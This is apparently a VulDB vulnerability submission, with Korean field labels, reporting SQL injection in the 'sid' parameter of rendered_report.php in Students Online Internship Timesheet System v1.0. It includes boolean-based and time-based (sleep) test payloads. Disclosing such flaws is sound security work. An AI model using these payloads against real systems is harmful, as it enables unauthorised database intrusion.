| 제목 | Students Online Internship Timesheet System v1.0 /internship_timesheet/rendered_report.php GET parameter sid exists SQL injection vulnerability |
|---|
| 설명 | Students Online Internship Timesheet System v1.0 exists SQL injection vulnerability.
Vulnerability File: /internship_timesheet/rendered_report.php
GET parameter sid exists SQL injection vulnerability.
Payload1: sid=1 and 777=777
The Boolean-based injection judgment is correct, so the page is displayed normally.
Payload2: sid=1 and 777=666
Boolean-based injection judgment error, so the page returns an exception.
Payload3: sid=1 and (select 2 from (select(sleep(5)))c)
The response time of the server is greater than 5 seconds. |
|---|
| 원천 | ⚠️ https://github.com/MiserablefaithL/CVERequestReport/blob/main/SQL.md |
|---|
| 사용자 | wwlcz (UID 47679) |
|---|
| 제출 | 2023. 05. 29. AM 04:31 (3 연령 ago) |
|---|
| 모더레이션 | 2023. 05. 29. AM 08:49 (4 hours later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 230142 [SourceCodester Students Online Internship Timesheet System 1.0 GET Parameter rendered_report.php sid SQL 주입] |
|---|
| 포인트들 | 20 |
|---|